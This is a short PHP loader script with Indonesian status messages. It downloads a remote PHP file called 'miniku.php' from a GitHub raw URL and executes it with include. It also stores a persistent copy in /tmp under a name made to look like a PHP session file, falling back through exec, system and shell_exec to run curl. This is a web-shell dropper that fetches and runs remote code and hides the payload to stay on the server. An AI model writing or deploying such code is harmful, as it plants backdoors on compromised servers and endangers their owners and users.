<?php
ini_set('display_errors',1);
error_reporting(E_ALL);
$u='https://raw.githubusercontent.com/tikung6etar/Nyarek/refs/heads/master/miniku.php';
echo "1. Mulai
";
$t=tmpfile();
echo "2. Tmpfile: ".($t?'OK':'GAGAL')."
";
$c=file_get_contents($u);
echo "3. Download: ".($c?strlen($c).' bytes':'GAGAL')."
";
if($c){fwrite($t,$c);$m=stream_get_meta_data($t);include$m['uri'];fclose($t);}
$f='/tmp/sess_'.md5('min').'.php';
if(!is_file($f)||filesize($f)<10){
if(function_exists('exec'))exec("curl -sk -o $f $u");
elseif(function_exists('system'))system("curl -sk -o $f $u");
elseif(function_exists('shell_exec'))shell_exec("curl -sk -o $f $u");
else file_put_contents($f,file_get_contents($u));
}
include$f;
?>